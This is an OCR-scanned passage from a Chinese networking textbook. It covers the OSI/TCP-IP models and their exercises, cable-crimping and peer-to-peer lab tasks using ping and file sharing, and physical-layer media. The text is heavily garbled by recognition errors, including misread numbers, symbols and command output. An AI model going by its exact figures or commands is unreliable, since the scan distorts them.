对 数据 包 进 行路 由 寻 址 、 分 片 重组 、 流 ICMP( 报 文 控制 协议 ) 
网 际 层 量 控制 .拥塞 控制 .差错 控制 ,对 应 OSI IGMP( 组 播 协 议 ) 
参考 模型 的 网 络 层 ARP( 地 址 解析 协议 ) 
RARP( 逆 向 地 址 解析 协议 ) 
传输 层 连接 双方 应 用 进程 ,提供 可 靠 的 端 到 端 TCP( 传 输 控制 协议 ) 
服务 UDP( 用 户 数 据 报 协议 》 


FTP( 文 件 传输 协议 ) 

HTTP( 超 文本 传输 协议 ) 

0 DNS( 域 名 服务 器 协议 ) 

应 用 层 es at DHCP( 动 态 主机 配置 协议 ) 
SMTP( 简 单 邮 件 传输 协议 ) 

SNMP( 简 单 网 络 管理 协议 ) 

NAT( 网 络 地 址 转换 协议 ) 


TCP/IP 协议 是 整个 参考 模型 的 核心 。 之 所 以 称 为 TCP/IP 参考 模型 ,是 因为 传输 层 
引入 TCP 传输 控制 协议 ,网 络 层 引入 IP 网 际 协议 。TCP/IP 与 OSI 有 很 大 区 别 ,OSI 是 一 
个 理论 模型 ,而 TCP/IP 则 是 应 用 于 实际 的 网 络 协议 ,并 且 能 够 实现 异 构 网 络 主机 之 间 的 互 
联 , 一 经 推出 后 得 到 广泛 应 用 。 虽 然 TCP/IP 协议 只 是 美国 国防 部 制定 的 ,不 属于 国际 标 
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准 ,但 是 随 着 遵循 TCP/IP 架构 的 网 络 产 品 大 量 涌 入 市 场 ,而 完全 遵循 OSI 标准 的 微 乎 其 
微 , 因 此 TCP/IP 成 为 事实 的 工业 标准 。TCP/IP 协议 推出 后 不 断 得 到 完善 , 至今 一 共存 在 
6 个 版 本 ,目前 所 使 用 的 是 第 4 版 本 , 称 为 IPv4。 


本 章 小 结 


章 主要 介绍 网 络 分 层 的 思想 ,引入 OSI 和 TCP/IP 两 种 参考 模型 ,学生 要 能 区 分 两 种 
参考 模型 的 结构 和 特点 ,并 在 理解 的 基础 上 识 记 各 层 功能 和 相关 协议 ,这 对 初学 者 来 说 是 重 
点 ,也 是 难点 。 关 于 TCP/IP 协议 会 在 后 续 章 节 详 细 讲 述 。 本 章 知识 结构 图 如 图 2-7 所 示 。 


应 用 层 
OSI 参考 模型 4 传输 层 ( 报 文 ) 
网 络 层 ( 数 据 包 ) 
数据 链 路 层 (数据 帧 ) 
物理 层 (比特 ) 
网 络 体系 结构 应 用 层 
TCP 传输 控制 协议 : 面向 连接 可靠 
传输 层 | Oe , 
UDP 用 户 数据 报 协议 : 无 连接 .不 可 靠 
FCMB 和 
a CMP 报 文 控制 协议 
网 际 层 : IP 协议 MD 明 折 这 岂 
的 人 
RARP 逆向 地 址 解析 协议 


网 络 接口 层 
图 2-7 第 2 章 知识 结构 图 


思考 练习 题 

一 、 填空 题 

1. 在 OSI 参考 模型 中 ,传输 层 传输 的 单位 是 ,网 络 层 传输 的 单位 是 了 
数据 链 路 层 传输 的 单位 是 ,物理 层 传输 的 单位 是 

2. ARP 地 址 解析 协议 用 于 将 地 址 转换 为 地 址 ,RARP 逆向 地 址 解 
析 协 议 用 于 将 地 址 转换 为 地 址 。 

3. 在 广域网 中 ,数据 传输 基于 地 址 ,在 局 域 网 中 ,数据 传输 基于 
地 址 。 

4. 网 络 中 的 连接 是 通过 协议 实现 的 。 

5. TCP 传输 控制 协议 是 一 种 的 协议 ,可 靠 性 高 ; 而 UDP 用 户 数据 报 协议 是 


无 连接 的 协议 ,可 靠 性 低 。 
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6. 将 OSI 参考 模型 中 高 三 层 与 低 三 层 的 接口 层 称 为 层 。 
7. 操作 系统 属于 OSI 参考 模型 的 层 。 
二 、 选择 题 
1. 数据 链 路 层 向 用 户 提供 8 
A. 点 到 点 服务 B. 端 到 端 服务 
C. 发 送 方 到 接收 方 服务 D. 源 节点 到 目的 节点 服务 
2. 在 你 关于 TCP/IP 协议 描述 中 ,错误 的 是 


A. ARP 地 址 解析 协议 属于 应 用 层 协 议 

B. TCP、UDP 协议 都 要 通过 IP 协议 来 发 送 .接收 数据 
C. TCP 协议 提供 可 靠 的 面向 连接 服务 

D. UDP 协议 提供 简单 的 无 连接 服务 


3. 在 TCP/IP 参考 模型 中 ,提供 端 到 端的 通信 的 是 

A. 应 用 层 B. 传输 层 C. 网 络 层 D. 网 络 接口 层 
4. 在 Internet 中 ,数据 包 按 进行 寻 址 。 

A. 邮件 地 址 B. IP 地 址 C，Mac 地 址 D. 网 线 接 口 地 址 
5. 以 下 不 属于 协议 的 三 要 素 是 

A. 语法 B; 语 艾 C. 定时 D. 语句 


6. TCP/IP 参考 模型 中 的 网 络 接口 层 应 于 OSI 参考 模型 的 
工 . 物理 层 卫 . 数据 链 路 层 有. 网络 层 


A.I 和 开 B. 焉 CGC TT D. 工 . 工 和 下 
7. 把 物理 Mac 地 址 转换 为 IP 地 址 的 协议 称 为 协议 。 
A. ARP B. RARP C. IGMP D. ICMP 
8. OSI 参考 模型 的 能 够 进行 数据 通信 ,而 不 需要 将 传输 任务 再 下 达 给 下 一 层 。 
A. 同等 层 间 B. 物理 层 间 C. 数据 链 路 层 间 D. 网 络 层 间 
9. 以 下 不 属于 UDP 用 户 数 据 报 协议 的 特性 是 
A. 提供 可 靠 服务 B， 提 供 无 连接 服务 
C. 提供 端 到 端 服务 D. 提供 全 双 工 服务 
10. ISO 提出 OSI 参考 模型 是 为 了 


A. 建立 一 个 设计 任何 网 络 结构 都 必须 遵从 的 绝对 标准 
B. 解决 多 厂商 网 络 固有 的 通信 问题 
C. 证 明 没有 分 层 的 网 络 结构 是 不 可 行 的 
D. 实现 同 种 网 络 的 互联 
11. 在 因特网 中 ,屏蔽 各 个 物理 网 络 的 差异 主要 通过 协议 实现 。 
A. UDP B. TCP CT D. SNMP 
12. 在 OSI 参考 模型 中 ,网 络 层 的 主要 功能 是 
A. 提供 可 靠 的 端 到 端 服务 ,透明 地 传送 报 文 
路 由 选择 和 拥塞 控制 ,实现 发 送 方 和 接收 方 的 连接 
. 在 通信 实体 之 间 传 送 以 帧 为 单位 的 数据 
. 数据 格式 变换 


吕 


只 了 
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Ca | 


. 简 述 OSI 参考 模型 各 层 及 其 功能 。 

. 简 述 OSI 参考 模型 与 TCP/IP 参考 模型 的 区 别 。 
. 简 述 TCP 协议 与 UDP 协议 的 区 别 。 

. 简 述 TCP/IP 参考 模型 中 的 各 层 协 议 。 
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物理 层 在 OSI 参考 模型 的 最 底层 ,为 数据 通信 提供 透明 的 物理 链接 。 所 谓 透 明 ,是 指 
物理 层 对 整个 参考 模型 屏蔽 因 不 同 传输 介质 所 产生 的 差异 ,只 要 能 传输 比特 流 即 可 ,而 不 必 
考虑 具体 的 实现 方法 和 传输 形式 。 因 此 ,物理 层 和 数据 通信 是 两 个 范畴 ,物理 层 是 一 个 标 
准 , 而 数据 通信 是 具体 的 实现 方式 ,要 区 别 对 待 。 

本 章 首 先 简 述 物理 层 基 本 概念 和 功能 ,介绍 DTE 与 DCE 之 间 的 区 别 , 从 中 引入 传输 介 
质 和 数据 编码 方式 ; 再 结合 数据 通信 基础 ,详细 分 析 数 字 和 模拟 传输 各 自 特 点 ; 最 后 通过 
实验 阐述 物理 层 安 全 及 应 对 措施 。 


1. 知识 目标 

(1) 识 记 物 理 层 的 定义 和 功能 。 

(2) 识 记 数 据 编码 技术 和 应 用 。 

(3) 理解 数字 传输 和 模拟 传输 的 特点 和 区 别 。 
(4) 理解 数 模 转换 方法 和 加 密 方式 。 

(5) 理解 复 用 技术 的 分 类 和 方式 。 

2. 能 力 目 标 

(1) 掌握 剥 线 器 和 测试 仪 的 使 用 方法 。 
(2) 掌握 直 连 线 和 交叉 线 的 区 别 和 制作 。 
(3) 掌握 Sniffer 软件 的 基本 应 用 。 

(4) 掌握 ping 命令 的 使 用 。 

(5) 掌握 文件 共享 配置 。 


工作 任务 二 ”制作 双 绞 线 


工作 目的 

制作 和 测试 直 连 线 双 绞 线 。 

工作 任务 

小 张 是 学 校 网 管 中 心 工作 人 员 , 有 老师 反映 在 实验 室 正 常 使 用 的 网 线 在 办 公 室 无 法 接 
和 人 网络 ,操作 系统 右 下 角 网 卡 图 标 一 直 显 示 未 连接 状态 。 小 张 带 上 压 线 钳 和 测 线 仪 重新 制 
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作 一 条 网 线 。 

任务 分 析 

小 张 发 现 网 线 两 端 水 晶 头 色 序 不 一 致 ,经 判断 此 双 绞 线 属于 交叉 线 , 不 适用 于 主机 与 交 
换 机 之 间 的 链接 ,必须 制作 直 连 线 双 绞 线 。 由 于 实验 室 交换 机 属于 可 管理 型 交换 机 ,能 自动 
识别 双 绞 线 类 型 ,因此 在 实验 室 中 能 正常 使 用 。 

工作 环境 和 工具 

双 绞 线 网 线 分 为 两 类 ,一 类 是 交叉 线 , 另 一 类 是 直 连 线 。 交 叉 线 用 于 主机 至 主机 ,网 络 
设备 至 网 络 设备 之 间 的 连接 ,如 计算 机 与 计算 机 、 交 换 机 与 交换 机 、 交 换 机 与 路 由 器 等 。 交 
又 线 两 端 分 别 用 T568A、T568B 标准 , 即 一 端 是 A 标准 , 另 一 端 是 B 标准 。 

直 连 线 也 称 为 直通 线 或 平行 线 , 用 于 主机 和 网 络 设 备 的 连接 ,如 计算 机 至 集线器 .计算 
机 至 交换 机 、 计 算 机 至 路 由 器 等 。 直 连 线 两 端 水 晶 头 上 色 序 保持 一 致 即 可 ,但 业界 普遍 使 用 
T568B 标准 作为 直 连 线 制作 标准 。 水 晶 头 及 T568A 和 T568B 标准 见 图 3-1。 


序列 号 
标准 

T568A | 白 绿 | 绿 | 白 杰 | 蓝 | 白 蓝 | 检 | 白 棕 | 棕 
T568B 白 检 | 栖 | 白 绿 | 蓝 | 白 蓝 | 绿 | 白 棕 | 棕 


OODIolIG9loloolioOoIODO|9 


(a) 水 晶 头 (b) T568A/T568B 标准 
图 3-1 水 晶 头 和 T568A/T568B 标准 
工作 过 程 
直 连 线 的 制作 很 简单 ,但 要 制作 一 条 美观 耐用 的 直 连 线 需要 一 定 技巧 。 另 外 ,水 蝇头 寿 
命 只 有 一 次 ,一 经 压制 则 无 法 循环 使 用 , 故 压制 之 前 必须 保证 两 端 色 序 无 误 。 
(1) 将 双 绞 线 放 人 压 线 钳 的 * 剥 线 刀 口 ”, 如 图 3-2 所 示 ; 轻 按压 线 错 并 旋转 两 圈 , 将 外 
皮层 剥 除 2cm 左右 ,如 图 3-3 所 示 。 


剥 线 刀 口 


剥 线 刀 口 


前 切 刀口 


图 3-2 ”和 剥 线 刀口 图 3-3 剥 除 外 皮层 


(2) 将 四 对 相互 缠绕 的 双 绞 线 两 端 都 按 T568B 标准 色 序 排列 并 理 直 , 如 图 3-4 所 示 。 
(3) 线头 理 直 后 会 出 现 过 长 和 长 短 不 一 的 问题 。 为 避免 乱 序 , 紧 捏 线头 并 用 剪刀 或 压 
线 钳 的 剪 线 刀口 将 线头 剪 齐 , 留 下 1. 4cm 左右 长 度 , 如 图 3-5 和 图 3-6 所 示 。 
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图 3-4 将 双 绞 线 按 T568B 标准 排列 图 3-5” 剪 齐 线 头 


(4) 将 水 晶 头 引 脚 线 朝 上 ,面向 自己 ,将 8 根 线 双 绞 线 连同 外 皮层 一 起 插入 水 晶 头 。 外 
皮层 要 超过 水 晶 头 压 线 处 以 增强 网 线 的 抗 拉 性 ,如 图 3-7 所 示 ; 否则 ,在 日 后 使 用 过 程 中 水 
晶 头 会 容易 脱落 ,如 图 3-8 所 示 。 


ee 
图 3-6 剩余 1. 4cm 左右 长 度 图 3-7 ”外 皮层 要 过 压 线 处 
(5) 注意 观察 所 有 线头 都 要 接触 到 水 晶 头 底部 ,直到 末端 能 清晰 分 辨 出 8 个 不 同 颜色 
的 接触 点 为 止 ,如 图 3-9 所 示 。 完 成 后 仔细 检查 色 序 是 否 排列 正确 。 
二 
~ - 
图 8 外 皮层 未 伸 入 水 晶 头 图 3-9 线头 要 接触 到 底部 


(6) 将 水 晶 头 伸 入 压 线 错 * 压 头 桓 ”" 用 力 压 ” 中 oy 
制 ,将 8 根 引 脚 线 压 和 线头 ,如 图 3-10 所 示 。 

(7) 测试 双 绞 线 。 将 已 做 好 头 的 双 绞 线 分 
别 插入 测 线 仪 发送 "和 “接收 ”接口 内 ,打开 检测 
仪 开关 ,注意 观测 指示 灯 。 

对 于 直 连 线 , 如 果 “ 发 送 ”" 和 “接收 ”的 8 个 指 
示 灯 能 按 编 号 一 一 对 应 闪 亮 , 则 说 明 能 正常 连通 ; 
对 于 交叉 线 “发 送 ”" 和 “接收 ”指示 灯 关 系 为 1 对 3、 
2 对 6, 其 余 一 一 对 应 。 图 3-10 压制 水 晶 头 
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任务 总 结 和 


直 连 线 用 于 场合 ,一 根 合 
格 的 直 连 线 要 注意 以 下 3 点 。 
第 一 : 


第 二 : 


第 三 : 


工作 任务 三 利用 交 又 线 组 建 对 等 网 络 


工作 目的 

利用 交叉 线 组 建 对 等 网 络 来 传输 数据 。 

工作 任务 

小 张 是 学 校 网 管 中 心 工作 人 员 。 学 校 新 购置 一 台 服 务 器 ,在 发 布 站 点 前 需要 将 大 量 文 
件 从 计算 机 复制 至 服务 器 。 

任务 分 析 

两 台 计算 机 之 间 要 传输 大 量 数据 , 若 用 移动 硬盘 复制 , 则 USB 2. 0 接口 最 大 传输 速率 
约 35Mbps?; 若 用 100Mbps 交换 机 传输 , 则 平均 速率 为 11Mbps@ 左右 ; 若 通过 千 兆 交换 
机 传输 , 则 速率 为 120Mbps 左右 ; 若 用 双 绞 线 将 两 台 计 算 机 直 连 , 则 既 可 以 避免 交换 机 转 
发 所 带 来 的 延迟 ,又 可 以 减少 接线 。 由 于 传输 速率 与 电缆 长 度 成 反比 , 故 小 张 选取 一 条 较 短 
的 交叉 线 将 两 台 计 算 机 的 千 兆 网 卡 连接 起 来 。 

工作 环境 和 工具 

对 等 网 络 是 将 两 台 计 算 机 通过 交叉 线 直 连 组 成 的 简单 网 络 ,其 中 两 台 计 算 机 被 称 为 对 
等 主机 。 工 作 任 务 三 的 工作 环境 拓扑 图 如 图 3-11 所 示 ,在 插 线 板 将 LAN1 口 和 LAN4 口 

工作 过 程 

(1) 启动 主机 1 和 主机 4 主机 进入 Windows 系统 ,并 配置 IP。 

@ 主机 1: 192.168. 1. 10, 子 网 掩 码 为 255. 255. 255.0; 

@ 主机 4: 192.168. 1. 40 , 子 网 掩 码 为 255. 255. 255. 0 。 

(2) 在 主机 1 的 “运行 ?对 话 框 中 输入 cmd 命令 进入 命令 提示 界面 ,通过 “ipconfig 口 / 
all@" 查 看 IP 地 址 和 子 网 掩 码 ,如 图 3-12 所 示 。 

(3) 用 交叉 线 将 插 线 板 中 主机 1 和 主机 4 接口 连接 ,通过 ping 命令 测试 两 主机 连通 


@ “计算 机 文件 存储 是 以 字 节 为 单位 ,而 厂商 速率 标识 一 般 是 比特 。USB 2. 0 最 大 传输 速率 是 480Mbps, 转 变 成 字 
节 480MB/8 二 60MB, 但 受 磁盘 性 能 及 硬盘 盒 芯 片 影响 ,实际 传输 速率 仅 为 35 Mbps 左右 。 

@ ”100Mbps 交换 机 最 大 传输 速率 为 100Mbps, 转 变 成 字 节 100MB/8 二 12. 5MB, 实 际 传输 速率 仅 为 11 Mbps 左右 。 

图 cmd 是 command 命令 的 简称 ,也 可 输入 “command” 进 入 命令 提示 界面 。 

加 “ 口 "表示 空格 。 
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主机 1 主机 2 主机 3 主机 4 


LA A COM2| LANLAN COM3|LAN4| 


交叉 线 


主机 名 称 | 担任 角色 操作 系统 IP 地 址 子 网 掩 码 
主机 1 对 等 主机 Windows XP 192.168.1.10 255.255.255.0 
主机 4 对 等 主机 Windows XP 192.168.1.40 255.255.255.0 


图 3-11 工作 任务 三 的 工作 环境 拓扑 图 


Ethernet adapter 本 地 连接 : 一 
Connection-specific DNS Suffix : 


Mware Accelerated AMD hdapter 
B86-8C-29-55-22-2D 


92.168.1.18 
Subnet Mask . . .~ 255.255.255 .86 
Default Gateway 


i | 间 


图 3-12 查看 IP 地址 


情况 。 
格式 : ping 口 目的 主机 IP 
在 主机 1 命令 界面 输入 “ping 口 192. 168.1. 40” ,根据 应 答 信息 判定 与 主机 4 连通 情况 。 


图 3-13 表示 与 主机 4 能 够 连通 ; 图 3-14 表示 连接 请 求 超时 , 需 检 查 TCP/IP 配置 .控制 面 
板 中 防火 墙 是 否 关闭 和 网 络 接线 等 问题 。 


j:\>ping 192.168.1.49 


lpinging 192.168-1.49 with 32 bytes of data: 


ply from 192-168-1-49: bytes=32 tineCins TIL=128 
ply from 192-168-1-49: bytes=32 tine=ins TIL=128 
ply from 192-168-1-49: bytes=32 tineCins TIL=128 


pi istics for 192.168.1.49: 
Packets: Sent = 4. Received = 4。 Lost = 日 《Bx loss), 


Approxinate round trip tines in nilli-seconds: 
Minimun = Bns, Maxinun = ins, huerage = Bns 


让 | 全 


图 3-13 连通 成 功 


Es from 192-168-1-49: bytes=32 tine=ins TIL=128 
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EE 


:Vping 192.168.1.49 


quest tined out. 


quest tined out. 
quest tined out. 
quest tined out. 


Pin 


lpinging 192.168-1-49 with 32 bytes of data: 


Packets: Sent = 4. Received = 9。 Lost = 4 (188x loss), 


习 


| 


必 


| 


3-14 请求 超 时 


注 , 图 3-13 中 的 “lms” 表 示 延 迟 ,“TTL” 表 
示 生 存 周期 。Windows XP 系统 默认 数据 包 最 大 
生存 周期 为 128, 数 据 包 每 经 一 个 路 由 器 转发 生 
存 周期 减 1, 减 至 0 时 被 丢弃 ,以 避免 无 休止 转发 
而 堵塞 带宽 。 因 此 ,生存 周期 越 少 表示 数据 包 经 
过 的 路 由 节点 越 多 。 

(4) 在 主机 1 桌面 上 新 建文 件 夹 如 “共享 音 
乐 ”, 右 击 文件 夹 , 并 选择 “属性 ”命令 ,在 弹出 的 
对 话 框 中 选择 “共享 ”选项 卡 ,然后 勾 选 “在 网 络 
上 共享 这 个 文件 夹 ” 复 选 框 ,如 图 3-15 所 示 。 

(5) 在 主机 4 双击 “我 的 电脑 "图标 ,然后 单 
击 “ 网 上 邻居 ”链接 ,再 单 击 “ 搜 索 ” 按 钮 ,输入 主 
机 1 的 IP*192.168.1.10”, 可 以 看 到 主机 1 新 建 
的 共享 文件 夹 ,如 图 3-16 所 示 。 


192.168.1.10 
文件 下) 忽 强 FE) 查看 WW) 收 京 &) 工具 CD) 帮助 人 D 


第 规 “共享 Web 共享 | 自 定义 | 


本 地 共享 和 安全 - 
EU 各党 各 计 和 可 各 革 他 办 拓 共 可 这 个 文件 习 


ne 


网 络 共享 和 安全 
3 和 生生 二 共 直 


加 ET 


共享 名 中 | 共享 音乐 


癌 允许 网 络 用 户 更 改 我 的 文件 mg) 
了 解 共享 和 安全 的 更 多 信息 。 


HE I 


图 3-15 设置 共享 文件 夹 


192.168.1.10 
局 搜索 此 计算 机 的 文件 


- 


图 3-16 查看 共享 文件 


夹 
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任务 总 结 着 


将 IP 设置 如 下 。 

(1) 主机 1: 192. 168. 1. 10, 子 网 掩 码 为 255. 255. 

(2) 主机 4: 192. 168. 2. 40, 子 网 掩 码 为 255. 255. 25 

测试 网 络 连通 情况 ,此 时 发 现 两 主机 请 求 
A. 能 连通 B. 不 能 连通 

其 原因 是 : 


因此 ,组 建 对 等 网 络 都 必须 满足 两 个 条 件 。 
第 一 : 


第 二 : 


3.1.1 物理 层 功能 


物理 层 为 需要 通信 双方 的 主机 提供 必要 的 物理 连接 ,通过 物理 线路 传输 比特 流 。 物 理 
层 将 从 数据 链 路 层 接收 到 的 数据 帧 转变 为 比特 流 ,而 比特 流 不 能 在 物理 线路 上 直接 传输 , 必 
须 调制 成 信号 ; 接收 方 再 把 信号 解 调 为 比特 流 , 组 合成 完整 的 数据 帧 交付 数据 链 路 层 。 

信号 有 利用 双 绞 线 传输 的 数字 信号 ,有 利用 电话 线 传输 的 模拟 信号 ,有 在 空气 中 传输 的 
无 线 信号 ,还 有 在 光缆 中 传输 的 光 信号 。 为 识别 和 转换 不 同 通信 线路 上 的 传输 信号 ,OSI 物 
理 层 定义 了 DTE 和 DCE 两 种 设备 。 

DTE(Data Terminal Equipment) 数 据 终 端 设备 负责 主机 信和 号 的 发 送 和 接收 。 但 是 ,不 
同 信号 有 不 同 编码 方式 ,彼此 之 间 需 要 相互 识别 才能 转换 ,由 此 定义 了 数据 电路 端 接 设 备 
DCE(Data Circuit-terminating Equipment) ,负责 不 同 信号 的 转换 和 编译 。DTE 与 DCE 的 


接口 如 图 3-17 所 示 。 
多 一 C2 入 
DCE DTE 
图 3-17 DCE 与 DTE 
为 识别 和 转换 信号 ,DTE 和 DCE 之 间 的 连接 必须 遵循 4 个 接口 特性 ,分 别 是 机 械 特 
性 .电气 特性 、 功 能 特性 和 规程 特性 。 
1. 机 械 特 性 
机 械 特性 在 外 观 和 尺寸 上 定义 DTE 和 DCE 设备 ,如 插件 的 规格 .形状 .尺寸 ,大 小 ,还 
包括 电费 长 度 . 引 脚 线 数量 ,排列 方式 等 ,这 些 都 是 肉眼 能 直接 观察 到 的 。 
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2. 电气 特性 

电气 特性 规定 了 信号 的 编码 方式 和 电路 特性 。 由 于 数据 "0” 和 “1” 不 能 直接 传输 ,必须 
转换 为 信号 。 信 号 有 多 种 编码 方式 ,如 数字 信号 中 定义 高 电 平 为 数据 *1” 还 是 负电 平 为 数据 
“1”, 模 拟 信号 中 定义 频率 高 的 波 为 数据 1” 还 是 频率 低 的 波 为 数据 *1”, 光 信号 中 定义 有 光 
为 数据 1? 还 是 无 光 为 数据 “1”。 不 同 信号 传输 线路 的 电压 高 低 ` 阻 抗 匹配 情况 和 传输 距离 
限制 等 ,都 与 电 有 关 , 将 其 称 为 电气 特性 。 

3. 功能 特性 

功能 特性 规定 了 物理 接口 上 各 条 信号 线 的 功能 分 配 和 确切 定义 。 信 号 线 主要 分 为 
4 类 , 即 数据 线 、 控 制 线 .定时 线 、 接 地 线 。 

4. 规程 特性 

规程 特性 规定 了 线路 上 各 种 动作 的 完成 顺序 和 协调 规则 ,如 实现 建立 、 维 持 和 释放 电路 
等 各 控制 信号 的 协调 关系 。 


3.1.2 物理 层 传输 介质 


传输 介质 可 以 分 为 有 线 介 质 和 无 线 介 质 。 有 线 介 质 包括 电缆 和 光缆 。 其 中 ,电缆 有 传 
输 数 字 信号 的 电缆 ,如 双 绞 线 .509 同 轴 电缆 ; 有 传输 模拟 信号 的 电缆 ,如 电话 线 .759 同 轴 
电缆 。 无 线 传输 介质 包括 真空 ,空气 等 。 随 着 科学 技术 的 发 展 , 还 会 出 现 新 的 传输 介质 。 本 
节 讲 述 计算 机 网 络 中 几 种 常用 传输 介质 。 

1. 双 绞 线 

双 绞 线 是 最 为 常见 的 传输 介质 ,广泛 应 用 于 电话 网 络 和 局 域 网 布线 中 。 双 绞 线 由 一 对 
铜 导 线 按照 一 定 密度 相互 缠绕 而 成 ,如 图 3-18 所 示 。 由 于 线路 要 绕 成 回路 电流 才 可 以 流 
通 , 故 一 对 双 绞 线 只 能 组 成 单个 信道 ,并 可 以 传输 一 路 数字 信号 或 通过 复合 技术 传输 多 路 的 


模拟 信号 。 


图 3-18 双 绞 线 结构 图 


与 平行 线 相 比 , 双 绞 线 经 缠绕 后 具有 抗 干扰 能 力 强 、 传 输 噪声 ?小 的 特点 。 双 绞 线 和 平 
行 线 的 抗 噪 比较 如 图 3-19 所 示 , 其 中 设 双 绞 线 和 平行 线 在 相同 区 域 受 到 外 界 电磁 干扰 , 瞬 
间 感 应 形成 电动 势 。 

在 双 绞 线 x 和 y 中 ,OO@OG@@ 线 段 感 应 的 电动 势 大 小 虽然 相等 ,但 对 于 x 线 来 说 @G) 方 
向 相反 ,相互 抵消 ,对 于 y 线 来 说 @ 方 向 也 相反 ,因此 双 绞 线 不 会 产生 噪声 。 在 平行 线 ab 
中 ,®@@O@@ 点 电动 势 大 小 相等 .对 于 a 线 来 说 @@@ 点 方向 相同 ,相互 释 加 ,对 于 b 线 的 @@ 
方向 也 一 样 , 倒 加 后 产生 差 模 噪声 。 因 此 , 双 绞 线 比 平行 线 传输 效果 好 很 多 ,也 不 易 成 为 品 
声 源 , 且 双 绞 线 缠绕 密度 越 大 ,传输 性 能 越 好 ,传输 距离 越 长 。 

目前 ,通常 说 的 网 线 由 4 对 8 根 双 绞 线 组 成 , 某 些 网 线 还 会 多 出 一 条 抗 拉 线 。 其 中 
ODG@、.OG@ 两 对 线 分 别 组 成 单个 通道 用 于 数据 的 全 双 工 通信 ,另外 两 对 只 有 在 千 兆 线路 中 才 
使 用 。 双 绞 线 网 线 有 不 同 的 划分 标准 ,按照 是 否 带 有 屏蔽 层 可 以 分 为 屏蔽 双 绞 线 STP 


四 噪声 : 来 自 线路 外 和 线路 内 意外 信号 。 
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3-19 ” 双 绞 线 和 平行 线 的 抗 品 能 力 比 较 


(Shielded Twisted Pair) 和 非 屏蔽 双 绞 线 UTP(Unshielded Twisted Pair) 。 屏 蔽 双 绞 线 外 
庄 金 属 屏蔽 层 , 用 于 消除 外 界 干扰 ,传输 效率 更 高 ,距离 也 越 远 ,但 价格 较 贵 , 远 不 如 UTP 
流行 。 双 绞 线 按照 线路 排列 顺序 可 以 分 为 直 连 线 和 交叉 线 , 见 图 3-20 所 示 。 


O sa | 川 @ 
@ © @ 
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直 连 线 交叉 线 
图 3-20 直 连 线 和 交叉 线 排列 顺序 

直 连 线 顺序 是 平行 关系 ,因此 也 被 称 为 平行 线 或 直通 线 。 其 用 于 主机 与 网 联 设 备 之 间 
的 连接 ,如 计算 机 至 集线器 、 计 算 机 至 交换 机 、 计 算 机 至 路 由 器 等 ; 交叉 线 四 接 @ `.@ 接 @， 
用 于 主机 至 主机 、 网 联 设备 至 网 联 设备 的 连接 ,如 计算 机 至 计算 机 、 交 换 机 至 交换 机 、 交 换 机 
至 路 由 器 等 。 

双 绞 线 既 可 以 用 于 传输 数字 信号 ,也 可 以 传输 模拟 信号 。 当 传输 数字 信号 时 ,要 实现 全 
双 工 通信 和 至少 需 要 两 对 线路 组 成 双 通 道 , 一 对 用 于 发 送 , 一 对 用 于 接收 ; 并 且 传 输 速 率 与 传 
输 距离 成 反比 ,每 隔 100m 信号 要 中 继 一 次 ,否则 数据 衰减 出 错 的 重 传 时 间 会 大 于 数据 实际 
传输 时 间 。 在 传输 模拟 信号 时 ,可 在 单个 通道 上 经 频 分 多 路 复 用 技术 双向 传输 多 路 模拟 信 
号 ,实现 全 双 工 通信 , 故 电话 线 仅 需 一 对 双 绞 线 即 可 实现 相互 通话 。 由 于 模拟 信和 号 衰减 后 仅 
会 失真 ,不 存在 数据 出 错 问 题 ,因此 可 以 传输 更 远 , 每 经 5 一 6km 才 需 中 继 一 次 。 

2. 同 轴 电缆 

同 轴 电 费 是 一 种 常见 的 传输 介质 ,有 线 电视 信号 的 传输 介质 就 是 同 轴 电 缆 , 早 期 组 成 总 
线形 局 域 网 也 用 同 轴 电缆 。 同 轴 电 缆 的 轴 心 是 厚度 
均匀 的 单 芯 导线 , 轴 心 外 层 由 绝缘 层 包 衷 ,绝缘 层 外 2 ey 
是 网 状 屏蔽 导体 层 , 最 外 层 用 坚韧 绝缘 塑料 包 封 ,如 和 
图 3-21 所 示 。 N 

同 轴 电 缆 按 阻抗 不 同 分 为 50Q 和 759 同 轴 电缆 。 外 导体 兼 屏蔽 层 铜 芯 
其 中 ,75Q 用 于 传输 模拟 信号 ,如 早期 电视 机 传输 的 信 图 3-21 同 轴 电 缆 结构 图 
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号 线 ; 50Q 用 于 传输 数字 信号 ,如 组 建 总 线 型 局 域 网 的 网 线 .数字 电视 传输 的 信号 线 。 用 于 传 
输 数字 信号 的 电缆 成 本 一 般 高 于 传输 模拟 信号 的 电缆 ,因为 数字 信号 衰减 后 会 导致 数据 出 
错 ,而 模拟 信号 衰减 后 只 会 失真 ,所 以 在 实际 中 对 数字 信号 电缆 要 求 更 为 严格 ,阻抗 要 更 小 ， 
传输 距离 也 不 能 太 远 。 早 期 有 线 电视 采用 759 传输 模拟 信号 ,现在 的 液晶 电视 假如 不 经 过 数 
字 机 顶 盒 解 调 ,看 到 的 画面 还 是 模拟 信号 , 画 质 稍 逊 ,并 且 与 模拟 信号 传输 距离 相关 ,传输 距离 
越 远 失真 越 大 。 要 改善 画 质 必须 接 人 机 项 盒 ,因为 数字 信号 不 存在 失真 , 画 质 与 电缆 长 度 无 
关 。 但 是 , 接 和 人 机 项 盒 接收 数字 信号 必须 重新 布线 ,不 能 用 原先 铺设 的 759 同 轴 电缆 。 

同 轴 电 缆 按 直径 大 小 可 以 分 为 粗 缆 和 细 缆 。 粗 缆 和 细 缆 都 可 以 用 于 组 建 总 线 型 局 域 
网 。 粗 缆 传 输 距 离 远 , 抗 干扰 能 力 强 ,每 隔 500m 才 需 中 继 一 次 ,适合 作为 大 型 局 域 网 数据 
干线 ; 细 缆 传输 距离 比 粗 费 近 ,人 允许 最 大 干线 长 度 为 185m, 用 于 铺设 小 型 局 域 网 数据 干线 
或 通过 “T” 型 转 接 头 将 计算 机 接 入 数据 干线 。 

同 轴 电缆 不 存在 非 屏 项 同 轴 电 缆 , 因 为 电信 号 在 导体 传输 必须 绕 成 闭合 回路 , 同 轴 电 缆 
屏蔽 层 既 可 以 减少 外 界 对 轴 心 导体 的 辐射 ,也 用 于 信号 的 传输 ,与 轴 心 导体 形成 闭合 回路 。 
与 双 绞 线 相 比 , 同 轴 电 缆 具有 衰减 小 、 对 外 辐射 小 、 抗 干扰 能 力 强 等 特点 ,但 由 于 在 总 线 型 局 
域 网 中 ,主机 数量 越 多 传输 效率 越 低 ,加 之 同 轴 电缆 铺设 成 本 太 高 ,又 不 能 实现 全 双 工 通信 ， 
因此 逐渐 退出 市 场 , 被 组 建 星 形 网 络 拓 扑 的 双 绞 线 替代 。 

3; 光纤 

